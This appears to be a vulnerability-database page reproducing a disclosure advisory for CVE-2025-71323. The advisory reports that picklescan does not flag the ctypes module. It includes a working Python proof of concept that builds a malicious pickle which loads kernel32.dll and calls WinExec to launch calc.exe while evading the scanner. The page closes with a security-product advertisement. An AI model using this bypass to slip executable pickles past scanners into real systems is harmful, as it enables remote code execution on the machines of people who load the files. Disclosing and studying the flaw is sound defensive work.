🛡️ CVE-2025-71323 — picklescan

🔴 CVSS 9.8 — Critical ✅ No Known Exploit CWE-184 NVD
9.8
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Picklescan does not block ctypes

Summary

Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to

  • Load DLLs
  • Call C functions directly
  • Manipulate memory raw pointers.

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected

PoC

```python

import pickle

import ctypes

import operator

class Kernel32Loader:

def __reduce__(self):

#we go direct to the kerneeellllllll

return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:

def __reduce__(self):

return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:

def __reduce__(self):

#methodcaller to invoke "__call__" on the function pointer.

return (

operator.methodcaller("__call__", b"calc.exe", 1),

(WinExecGetter(),)

)

try:

payload = pickle.dumps(PopCalc())

with open("calc_exploit.pkl", "wb") as f:

f.write(payload)

print("Generated 'calc_exploit.pkl'")

except Exception as e:

print(f"Generation failed: {e}")

```

This will create a pickle file which is not detected by the latest version of picklescan as malicious

```python

import pickle

print("Loading bypass.pkl...")

pickle.load(open("calc_exploit.pkl", "rb"))

```

<img width="1333" height="677" alt="image" src="https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176" />

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity high, availability high.

Affected software

CVE-2025-71323 is recorded against 2 packages.

  • picklescan (fixed in 0.0.33)
  • unknown

Timeline and source

Published on 29 December 2025 and last revised on 7 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Web)
github.com (Package)
github.com (Web)
www.vulncheck.com (Web)

Details

Severity HIGH
CVSS Score 9.8
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE CWE-184
Public Exploit ✅ No
Source NVD
Published 2025-12-29
Updated 2026-08-12
Modified 2026-07-07
Fix URL N/A

Affected Packages

Software From version Fixed in
picklescan 0.0.33
unknown

Similar Threats

Exploit Protection

Are you running picklescan?

CVE-2025-71323 carries CVSS 9.8 Critical rating. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-71323 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.